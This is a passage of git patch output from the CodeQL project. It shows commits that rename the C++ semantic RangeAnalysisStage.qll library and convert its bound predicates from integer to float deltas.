e2.(SemBitOrExpr).getAnOperand() = e1 and + semPositive(e2) and + delta = 0 and + upper = false + or + Specific::hasBound(e2, e1, delta, upper) + } + + /** Holds if `e2 = e1 * factor` and `factor > 0`. */ + private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, int factor) { + exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | + e2.(SemMulExpr).hasOperands(e1, c) and factor = k + or + exists(SemShiftLeftExpr e | + e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + ) + ) + } + + /** + * Holds if `e2 = e1 / factor` and `factor > 0`. + * + * This conflates division, right shift, and unsigned right shift and is + * therefore only valid for non-negative numbers. + */ + private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, int factor) { + exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | + exists(SemDivExpr e | + e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = k + ) + or + exists(SemShiftRightExpr e | + e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + ) + or + exists(SemShiftRightUnsignedExpr e | + e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + ) + ) + } + + /** + * Holds if `b + delta` is a valid bound for `v` at `pos`. + * - `upper = true` : `v <= b + delta` + * - `upper = false` : `v >= b + delta` + */ + private predicate boundedSsa( + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, boolean upper, + boolean fromBackEdge, int origdelta, SemReason reason + ) { + exists(SemExpr mid, int d1, int d2, SemReason r1, SemReason r2 | + boundFlowStepSsa(v, pos, mid, d1, upper, r1) and + bounded(mid, b, d2, upper, fromBackEdge, origdelta, r2) and + // upper = true: v <= mid + d1 <= b + d1 + d2 = b + delta + // upper = false: v >= mid + d1 >= b + d1 + d2 = b + delta + delta = d1 + d2 and + (if r1 instanceof SemNoReason then reason = r2 else reason = r1) + ) + or + exists(int d, SemReason r1, SemReason r2 | + boundedSsa(v, pos, b, d, upper, fromBackEdge, origdelta, r2) or + boundedPhi(v, b, d, upper, fromBackEdge, origdelta, r2) + | + unequalIntegralSsa(v, pos, b, d, r1) and + ( + upper = true and delta = d - 1 + or + upper = false and delta = d + 1 + ) and + ( + reason = r1 + or + reason = r2 and not r2 instanceof SemNoReason + ) + ) + } + + /** + * Holds if `v != b + delta` at `pos` and `v` is of integral type. + */ + private predicate unequalIntegralSsa( + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, SemReason reason + ) { + exists(SemExpr e, int d1, int d2 | + unequalFlowStepIntegralSsa(v, pos, e, d1, reason) and + boundedUpper(e, b, d1) and + boundedLower(e, b, d2) and + delta = d2 + d1 + ) + } + + /** + * Holds if `b + delta` is an upper bound for `e`. + * + * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. + */ + pragma[nomagic] + private predicate boundedUpper(SemExpr e, SemBound b, int delta) { + bounded(e, b, delta, true, _, _, _) + } + + /** + * Holds if `b + delta` is a lower bound for `e`. + * + * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. + */ + pragma[nomagic] + private predicate boundedLower(SemExpr e, SemBound b, int delta) { + bounded(e, b, delta, false, _, _, _) + } + + /** Weakens a delta to lie in the range `[-1..1]`. */ + bindingset[delta, upper] + private int weakenDelta(boolean upper, int delta) { + delta in [-1 .. 1] and result = delta + or + upper = true and result = -1 and delta < -1 + or + upper = false and result = 1 and delta > 1 + } + + /** + * Holds if `b + delta` is a valid bound for `inp` when used as an input to + * `phi` along `edge`. + * - `upper = true` : `inp <= b + delta` + * - `upper = false` : `inp >= b + delta` + */ + private predicate boundedPhiInp( + SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, SemBound b, + int delta, boolean upper, boolean fromBackEdge, int origdelta, SemReason reason + ) { + edge.phiInput(phi, inp) and + exists(int d, boolean fromBackEdge0 | + boundedSsa(inp, edge, b, d, upper, fromBackEdge0, origdelta, reason) + or + boundedPhi(inp, b, d, upper, fromBackEdge0, origdelta, reason) + or + b.(SemSsaBound).getAVariable() = inp and + d = 0 and + (upper = true or upper = false) and + fromBackEdge0 = false and + origdelta = 0 and + reason = TSemNoReason() + | + if semBackEdge(phi, inp, edge) + then + fromBackEdge = true and + ( + fromBackEdge0 = true and delta = weakenDelta(upper, d - origdelta) + origdelta + or + fromBackEdge0 = false and delta = d + ) + else ( + delta = d and fromBackEdge = fromBackEdge0 + ) + ) + } + + /** + * Holds if `b + delta` is a valid bound for `inp` when used as an input to + * `phi` along `edge`. + * - `upper = true` : `inp <= b + delta` + * - `upper = false` : `inp >= b + delta` + * + * Equivalent to `boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _)`. + */ + pragma[noinline] + private predicate boundedPhiInp1( + SemSsaPhiNode phi, SemBound b, boolean upper, SemSsaVariable inp, + SemSsaReadPositionPhiInputEdge edge, int delta + ) { + boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _) + } + + /** + * Holds if `phi` is a valid bound for `inp` when used as an input to `phi` + * along `edge`. + * - `upper = true` : `inp <= phi` + * - `upper = false` : `inp >= phi` + */ + private predicate selfBoundedPhiInp( + SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, boolean upper + ) { + exists(int d, SemSsaBound phibound | + phibound.getAVariable() = phi and + boundedPhiInp(phi, inp, edge, phibound, d, upper, _, _, _) and + ( + upper = true and d <= 0 + or + upper = false and d >= 0 + ) + ) + } + + /** + * Holds if `b + delta` is a valid bound for some input, `inp`, to `phi`, and + * thus a candidate bound for `phi`. + * - `upper = true` : `inp <= b + delta` + * - `upper = false` : `inp >= b + delta` + */ + pragma[noinline] + private predicate boundedPhiCand( + SemSsaPhiNode phi, boolean upper, SemBound b, int delta, boolean fromBackEdge, int origdelta, + SemReason reason + ) { + exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | + boundedPhiInp(phi, inp, edge, b, delta, upper, fromBackEdge, origdelta, reason) + ) + } + + /** + * Holds if the candidate bound `b + delta` for `phi` is valid for the phi input + * `inp` along `edge`. + */ + private predicate boundedPhiCandValidForEdge( + SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, + SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge + ) { + boundedPhiCand(phi, upper, b, delta, fromBackEdge, origdelta, reason) and + ( + exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = true and d <= delta) + or + exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = false and d >= delta) + or + selfBoundedPhiInp(phi, inp, edge, upper) + ) + } + + /** + * Holds if `b + delta` is a valid bound for `phi`. + * - `upper = true` : `phi <= b + delta` + * - `upper = false` : `phi >= b + delta` + */ + private predicate boundedPhi( + SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, + SemReason reason + ) { + forex(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | edge.phiInput(phi, inp) | + boundedPhiCandValidForEdge(phi, b, delta, upper, fromBackEdge, origdelta, reason, inp, edge) + ) + } + + /** + * Holds if `e` has an upper (for `upper = true`) or lower + * (for `upper = false`) bound of `b`. + */ + private predicate baseBound(SemExpr e, int b, boolean upper) { + Specific::hasConstantBound(e, b, upper) + or + upper = false and + b = 0 and + semPositive(e.(SemBitAndExpr).getAnOperand()) and + // REVIEW: We let the language opt out here to preserve original results. + not Specific::ignoreZeroLowerBound(e) + } + + /** + * Holds if the value being cast has an upper (for `upper = true`) or lower + * (for `upper = false`) bound within the bounds of the resulting type. + * For `upper = true` this means that the cast will not overflow and for + * `upper = false` this means that the cast will not underflow. + */ + private predicate safeNarrowingCast(NarrowingCastExpr cast, boolean upper) { + exists(int bound | bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) | + upper = true and bound <= cast.getUpperBound() + or + upper = false and bound >= cast.getLowerBound() + ) + } + + pragma[noinline] + private predicate boundedCastExpr( + NarrowingCastExpr cast, SemBound b, int delta, boolean upper, boolean fromBackEdge, + int origdelta, SemReason reason + ) { + bounded(cast.getOperand(), b, delta, upper, fromBackEdge, origdelta, reason) + } + + /** + * Holds if `b + delta` is a valid bound for `e`. + * - `upper = true` : `e <= b + delta` + * - `upper = false` : `e >= b + delta` + */ + private predicate bounded( + SemExpr e, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, + SemReason reason + ) { + not Specific::ignoreExprBound(e) and + ( + e = b.getExpr(delta) and + (upper = true or upper = false) and + fromBackEdge = false and + origdelta = delta and + reason = TSemNoReason() + or + baseBound(e, delta, upper) and + b instanceof SemZeroBound and + fromBackEdge = false and + origdelta = delta and + reason = TSemNoReason() + or + exists(SemSsaVariable v, SemSsaReadPositionBlock bb | + boundedSsa(v, bb, b, delta, upper, fromBackEdge, origdelta, reason) and + e = v.getAUse() and + bb.getBlock() = e.getBasicBlock() + ) + or + exists(SemExpr mid, int d1, int d2 | + boundFlowStep(e, mid, d1, upper) and + // Constants have easy, base-case bounds, so let's not infer any recursive bounds. + not e instanceof SemConstantIntegerExpr and + bounded(mid, b, d2, upper, fromBackEdge, origdelta, reason) and + // upper = true: e <= mid + d1 <= b + d1 + d2 = b + delta + // upper = false: e >= mid + d1 >= b + d1 + d2 = b + delta + delta = d1 + d2 + ) + or + exists(SemSsaPhiNode phi | + boundedPhi(phi, b, delta, upper, fromBackEdge, origdelta, reason) and + e = phi.getAUse() + ) + or + exists(SemExpr mid, int factor, int d | + boundFlowStepMul(e, mid, factor) and + not e instanceof SemConstantIntegerExpr and + bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and + b instanceof SemZeroBound and + delta = d * factor + ) + or + exists(SemExpr mid, int factor, int d | + boundFlowStepDiv(e, mid, factor) and + not e instanceof SemConstantIntegerExpr and + bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and + b instanceof SemZeroBound and + d >= 0 and + delta = d / factor + ) + or + exists(NarrowingCastExpr cast | + cast = e and + safeNarrowingCast(cast, upper.booleanNot()) and + boundedCastExpr(cast, b, delta, upper, fromBackEdge, origdelta, reason) + ) + or + exists( + SemConditionalExpr cond, int d1, int d2, boolean fbe1, boolean fbe2, int od1, int od2, + SemReason r1, SemReason r2 + | + cond = e and + boundedConditionalExpr(cond, b, upper, true, d1, fbe1, od1, r1) and + boundedConditionalExpr(cond, b, upper, false, d2, fbe2, od2, r2) and + ( + delta = d1 and fromBackEdge = fbe1 and origdelta = od1 and reason = r1 + or + delta = d2 and fromBackEdge = fbe2 and origdelta = od2 and reason = r2 + ) + | + upper = true and delta = d1.maximum(d2) + or + upper = false and delta = d1.minimum(d2) + ) + ) + } + + private predicate boundedConditionalExpr( + SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, int delta, + boolean fromBackEdge, int origdelta, SemReason reason + ) { + bounded(cond.getBranchExpr(branch), b, delta, upper, fromBackEdge, origdelta, reason) + } } From eebada46b1a07a74598be3c346d60b2038343e7c Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 13 Dec 2022 11:46:42 -0500 Subject: [PATCH 245/381] C++: rename to RagneAnalysisStage.qll --- .../analysis/{RangeAnalysis.qll => RangeAnalysisStage.qll} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/{RangeAnalysis.qll => RangeAnalysisStage.qll} (100%) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll similarity index 100% rename from cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll rename to cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll From b8c43d7a71302f5cdebe3cc044deef13ca6fa346 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Wed, 14 Dec 2022 16:32:31 -0500 Subject: [PATCH 246/381] C++: convert RangeAnalysis to float --- .../semantic/analysis/RangeAnalysisStage.qll | 184 +++++++++++------- 1 file changed, 110 insertions(+), 74 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 63f2ebe5fa5..df49be67643 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -64,13 +64,12 @@ */ private import RangeAnalysisSpecific as Specific -private import RangeUtils +private import RangeUtils as Utils private import SignAnalysisCommon private import ModulusAnalysis private import experimental.semmle.code.cpp.semantic.Semantic private import ConstantAnalysis - /** * An expression that does conversion, boxing, or unboxing */ @@ -89,8 +88,8 @@ private class ConvertOrBoxExpr extends SemUnaryExpr { */ private class SafeCastExpr extends ConvertOrBoxExpr { SafeCastExpr() { - conversionCannotOverflow(getTrackedType(pragma[only_bind_into](getOperand())), - getTrackedType(this)) + conversionCannotOverflow(Utils::getTrackedType(pragma[only_bind_into](getOperand())), + Utils::getTrackedType(this)) } } @@ -119,19 +118,49 @@ private predicate typeBound(SemIntegerType typ, int lowerbound, int upperbound) private class NarrowingCastExpr extends ConvertOrBoxExpr { NarrowingCastExpr() { not this instanceof SafeCastExpr and - typeBound(getTrackedType(this), _, _) + typeBound(Utils::getTrackedType(this), _, _) } /** Gets the lower bound of the resulting type. */ - int getLowerBound() { typeBound(getTrackedType(this), result, _) } + int getLowerBound() { typeBound(Utils::getTrackedType(this), result, _) } /** Gets the upper bound of the resulting type. */ - int getUpperBound() { typeBound(getTrackedType(this), _, result) } + int getUpperBound() { typeBound(Utils::getTrackedType(this), _, result) } } -signature module RangeSig { } +signature module DeltaSig { + class Delta; -module RangeStage { + bindingset[d] + bindingset[result] + float toFloat(Delta d); + + bindingset[d] + bindingset[result] + int toInt(Delta d); + + bindingset[n] + bindingset[result] + Delta fromInt(int n); + + bindingset[f] + bindingset[result] + Delta fromFloat(float f); +} + +signature module UtilSig { + SemExpr semSsaRead(SemSsaVariable v, DeltaParam::Delta delta); + + SemGuard semEqFlowCond( + SemSsaVariable v, SemExpr e, DeltaParam::Delta delta, boolean isEq, boolean testIsTrue + ); + + predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, DeltaParam::Delta delta); + + predicate semValueFlowStep(SemExpr e2, SemExpr e1, DeltaParam::Delta delta); +} + +module RangeStage UtilParam> { cached private module RangeAnalysisCache { cached @@ -146,7 +175,7 @@ module RangeStage { * condition. */ cached - predicate semBounded(SemExpr e, SemBound b, int delta, boolean upper, SemReason reason) { + predicate semBounded(SemExpr e, SemBound b, float delta, boolean upper, SemReason reason) { bounded(e, b, delta, upper, _, _, reason) and bestBound(e, b, delta, upper) } @@ -157,7 +186,7 @@ module RangeStage { */ cached predicate possibleReason(SemGuard guard) { - guard = boundFlowCond(_, _, _, _, _) or guard = semEqFlowCond(_, _, _, _, _) + guard = boundFlowCond(_, _, _, _, _) or guard = UtilParam::semEqFlowCond(_, _, _, _, _) } } @@ -169,10 +198,12 @@ module RangeStage { * - `upper = true` : `e <= b + delta` * - `upper = false` : `e >= b + delta` */ - private predicate bestBound(SemExpr e, SemBound b, int delta, boolean upper) { - delta = min(int d | bounded(e, b, d, upper, _, _, _)) and upper = true + private predicate bestBound(SemExpr e, SemBound b, float delta, boolean upper) { + delta = min(float d | bounded(e, b, d, upper, _, _, _)) and + upper = true or - delta = max(int d | bounded(e, b, d, upper, _, _, _)) and upper = false + delta = max(float d | bounded(e, b, d, upper, _, _, _)) and + upper = false } /** @@ -181,19 +212,21 @@ module RangeStage { * - `upper = false` : `v >= e + delta` or `v > e + delta` */ private predicate boundCondition( - SemRelationalExpr comp, SemSsaVariable v, SemExpr e, int delta, boolean upper + SemRelationalExpr comp, SemSsaVariable v, SemExpr e, float delta, boolean upper ) { - comp.getLesserOperand() = semSsaRead(v, delta) and e = comp.getGreaterOperand() and upper = true + comp.getLesserOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and + e = comp.getGreaterOperand() and + upper = true or - comp.getGreaterOperand() = semSsaRead(v, delta) and + comp.getGreaterOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and e = comp.getLesserOperand() and upper = false or - exists(SemSubExpr sub, SemConstantIntegerExpr c, int d | + exists(SemSubExpr sub, SemConstantIntegerExpr c, float d | // (v - d) - e < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and - sub.getLeftOperand() = semSsaRead(v, d) and + sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = true and delta = d + c.getIntValue() @@ -201,7 +234,7 @@ module RangeStage { // (v - d) - e > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and - sub.getLeftOperand() = semSsaRead(v, d) and + sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = false and delta = d + c.getIntValue() @@ -210,7 +243,7 @@ module RangeStage { comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, d) and + sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and upper = false and delta = d - c.getIntValue() or @@ -218,7 +251,7 @@ module RangeStage { comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, d) and + sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and upper = true and delta = d - c.getIntValue() ) @@ -271,10 +304,10 @@ module RangeStage { * - `upper = false` : `v >= e + delta` */ private SemGuard boundFlowCond( - SemSsaVariable v, SemExpr e, int delta, boolean upper, boolean testIsTrue + SemSsaVariable v, SemExpr e, float delta, boolean upper, boolean testIsTrue ) { exists( - SemRelationalExpr comp, int d1, int d2, int d3, int strengthen, boolean compIsUpper, + SemRelationalExpr comp, float d1, float d2, float d3, int strengthen, boolean compIsUpper, boolean resultIsStrict | comp = result.asExpr() and @@ -288,8 +321,8 @@ module RangeStage { ) and ( if - getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or - getTrackedTypeForSsaVariable(v) instanceof SemAddressType + Utils::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or + Utils::getTrackedTypeForSsaVariable(v) instanceof SemAddressType then upper = true and strengthen = -1 or @@ -314,13 +347,15 @@ module RangeStage { semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) ) or - result = semEqFlowCond(v, e, delta, true, testIsTrue) and + result = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and (upper = true or upper = false) or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and // exists a guard `guardEq` such that `v = v2 - d1 + d2`. - exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, int d1, int d2 | - guardEq = semEqFlowCond(v, semSsaRead(v2, d1), d2, true, eqIsTrue) and + exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2 | + guardEq = + UtilParam::semEqFlowCond(v, UtilParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), + true, eqIsTrue) and result = boundFlowCond(v2, e, delta + d1 - d2, upper, testIsTrue) and // guardEq needs to control guard guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) @@ -363,9 +398,10 @@ module RangeStage { * - `upper = false` : `v >= e + delta` */ private predicate boundFlowStepSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, boolean upper, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, boolean upper, + SemReason reason ) { - semSsaUpdateStep(v, e, delta) and + UtilParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and pos.hasReadOfVar(v) and (upper = true or upper = false) and reason = TSemNoReason() @@ -380,12 +416,12 @@ module RangeStage { /** Holds if `v != e + delta` at `pos` and `v` is of integral type. */ private predicate unequalFlowStepIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, SemReason reason ) { - getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and + Utils::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and exists(SemGuard guard, boolean testIsTrue | pos.hasReadOfVar(v) and - guard = semEqFlowCond(v, e, delta, false, testIsTrue) and + guard = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and reason = TSemCondReason(guard) ) @@ -393,12 +429,12 @@ module RangeStage { /** Holds if `e >= 1` as determined by sign analysis. */ private predicate strictlyPositiveIntegralExpr(SemExpr e) { - semStrictlyPositive(e) and getTrackedType(e) instanceof SemIntegerType + semStrictlyPositive(e) and Utils::getTrackedType(e) instanceof SemIntegerType } /** Holds if `e <= -1` as determined by sign analysis. */ private predicate strictlyNegativeIntegralExpr(SemExpr e) { - semStrictlyNegative(e) and getTrackedType(e) instanceof SemIntegerType + semStrictlyNegative(e) and Utils::getTrackedType(e) instanceof SemIntegerType } /** @@ -406,8 +442,8 @@ module RangeStage { * - `upper = true` : `e2 <= e1 + delta` * - `upper = false` : `e2 >= e1 + delta` */ - private predicate boundFlowStep(SemExpr e2, SemExpr e1, int delta, boolean upper) { - semValueFlowStep(e2, e1, delta) and + private predicate boundFlowStep(SemExpr e2, SemExpr e1, float delta, boolean upper) { + UtilParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and (upper = true or upper = false) or e2.(SafeCastExpr).getOperand() = e1 and @@ -474,7 +510,7 @@ module RangeStage { } /** Holds if `e2 = e1 * factor` and `factor > 0`. */ - private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, int factor) { + private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, float factor) { exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | e2.(SemMulExpr).hasOperands(e1, c) and factor = k or @@ -490,8 +526,8 @@ module RangeStage { * This conflates division, right shift, and unsigned right shift and is * therefore only valid for non-negative numbers. */ - private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, int factor) { - exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | + private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, float factor) { + exists(SemConstantIntegerExpr c, float k | k = c.getIntValue() and k > 0 | exists(SemDivExpr e | e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = k ) @@ -512,10 +548,10 @@ module RangeStage { * - `upper = false` : `v >= b + delta` */ private predicate boundedSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, boolean upper, - boolean fromBackEdge, int origdelta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, float delta, boolean upper, + boolean fromBackEdge, float origdelta, SemReason reason ) { - exists(SemExpr mid, int d1, int d2, SemReason r1, SemReason r2 | + exists(SemExpr mid, float d1, float d2, SemReason r1, SemReason r2 | boundFlowStepSsa(v, pos, mid, d1, upper, r1) and bounded(mid, b, d2, upper, fromBackEdge, origdelta, r2) and // upper = true: v <= mid + d1 <= b + d1 + d2 = b + delta @@ -524,7 +560,7 @@ module RangeStage { (if r1 instanceof SemNoReason then reason = r2 else reason = r1) ) or - exists(int d, SemReason r1, SemReason r2 | + exists(float d, SemReason r1, SemReason r2 | boundedSsa(v, pos, b, d, upper, fromBackEdge, origdelta, r2) or boundedPhi(v, b, d, upper, fromBackEdge, origdelta, r2) | @@ -546,9 +582,9 @@ module RangeStage { * Holds if `v != b + delta` at `pos` and `v` is of integral type. */ private predicate unequalIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int delta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, float delta, SemReason reason ) { - exists(SemExpr e, int d1, int d2 | + exists(SemExpr e, float d1, float d2 | unequalFlowStepIntegralSsa(v, pos, e, d1, reason) and boundedUpper(e, b, d1) and boundedLower(e, b, d2) and @@ -562,7 +598,7 @@ module RangeStage { * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. */ pragma[nomagic] - private predicate boundedUpper(SemExpr e, SemBound b, int delta) { + private predicate boundedUpper(SemExpr e, SemBound b, float delta) { bounded(e, b, delta, true, _, _, _) } @@ -572,13 +608,13 @@ module RangeStage { * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. */ pragma[nomagic] - private predicate boundedLower(SemExpr e, SemBound b, int delta) { + private predicate boundedLower(SemExpr e, SemBound b, float delta) { bounded(e, b, delta, false, _, _, _) } /** Weakens a delta to lie in the range `[-1..1]`. */ bindingset[delta, upper] - private int weakenDelta(boolean upper, int delta) { + private float weakenDelta(boolean upper, float delta) { delta in [-1 .. 1] and result = delta or upper = true and result = -1 and delta < -1 @@ -594,10 +630,10 @@ module RangeStage { */ private predicate boundedPhiInp( SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, SemBound b, - int delta, boolean upper, boolean fromBackEdge, int origdelta, SemReason reason + float delta, boolean upper, boolean fromBackEdge, float origdelta, SemReason reason ) { edge.phiInput(phi, inp) and - exists(int d, boolean fromBackEdge0 | + exists(float d, boolean fromBackEdge0 | boundedSsa(inp, edge, b, d, upper, fromBackEdge0, origdelta, reason) or boundedPhi(inp, b, d, upper, fromBackEdge0, origdelta, reason) @@ -634,7 +670,7 @@ module RangeStage { pragma[noinline] private predicate boundedPhiInp1( SemSsaPhiNode phi, SemBound b, boolean upper, SemSsaVariable inp, - SemSsaReadPositionPhiInputEdge edge, int delta + SemSsaReadPositionPhiInputEdge edge, float delta ) { boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _) } @@ -648,7 +684,7 @@ module RangeStage { private predicate selfBoundedPhiInp( SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, boolean upper ) { - exists(int d, SemSsaBound phibound | + exists(float d, SemSsaBound phibound | phibound.getAVariable() = phi and boundedPhiInp(phi, inp, edge, phibound, d, upper, _, _, _) and ( @@ -667,8 +703,8 @@ module RangeStage { */ pragma[noinline] private predicate boundedPhiCand( - SemSsaPhiNode phi, boolean upper, SemBound b, int delta, boolean fromBackEdge, int origdelta, - SemReason reason + SemSsaPhiNode phi, boolean upper, SemBound b, float delta, boolean fromBackEdge, + float origdelta, SemReason reason ) { exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | boundedPhiInp(phi, inp, edge, b, delta, upper, fromBackEdge, origdelta, reason) @@ -680,14 +716,14 @@ module RangeStage { * `inp` along `edge`. */ private predicate boundedPhiCandValidForEdge( - SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge + SemSsaPhiNode phi, SemBound b, float delta, boolean upper, boolean fromBackEdge, + float origdelta, SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge ) { boundedPhiCand(phi, upper, b, delta, fromBackEdge, origdelta, reason) and ( - exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = true and d <= delta) + exists(float d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = true and d <= delta) or - exists(int d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = false and d >= delta) + exists(float d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = false and d >= delta) or selfBoundedPhiInp(phi, inp, edge, upper) ) @@ -699,8 +735,8 @@ module RangeStage { * - `upper = false` : `phi >= b + delta` */ private predicate boundedPhi( - SemSsaPhiNode phi, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, - SemReason reason + SemSsaPhiNode phi, SemBound b, float delta, boolean upper, boolean fromBackEdge, + float origdelta, SemReason reason ) { forex(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | edge.phiInput(phi, inp) | boundedPhiCandValidForEdge(phi, b, delta, upper, fromBackEdge, origdelta, reason, inp, edge) @@ -711,7 +747,7 @@ module RangeStage { * Holds if `e` has an upper (for `upper = true`) or lower * (for `upper = false`) bound of `b`. */ - private predicate baseBound(SemExpr e, int b, boolean upper) { + private predicate baseBound(SemExpr e, float b, boolean upper) { Specific::hasConstantBound(e, b, upper) or upper = false and @@ -728,7 +764,7 @@ module RangeStage { * `upper = false` this means that the cast will not underflow. */ private predicate safeNarrowingCast(NarrowingCastExpr cast, boolean upper) { - exists(int bound | bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) | + exists(float bound | bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) | upper = true and bound <= cast.getUpperBound() or upper = false and bound >= cast.getLowerBound() @@ -737,8 +773,8 @@ module RangeStage { pragma[noinline] private predicate boundedCastExpr( - NarrowingCastExpr cast, SemBound b, int delta, boolean upper, boolean fromBackEdge, - int origdelta, SemReason reason + NarrowingCastExpr cast, SemBound b, float delta, boolean upper, boolean fromBackEdge, + float origdelta, SemReason reason ) { bounded(cast.getOperand(), b, delta, upper, fromBackEdge, origdelta, reason) } @@ -749,7 +785,7 @@ module RangeStage { * - `upper = false` : `e >= b + delta` */ private predicate bounded( - SemExpr e, SemBound b, int delta, boolean upper, boolean fromBackEdge, int origdelta, + SemExpr e, SemBound b, float delta, boolean upper, boolean fromBackEdge, float origdelta, SemReason reason ) { not Specific::ignoreExprBound(e) and @@ -772,7 +808,7 @@ module RangeStage { bb.getBlock() = 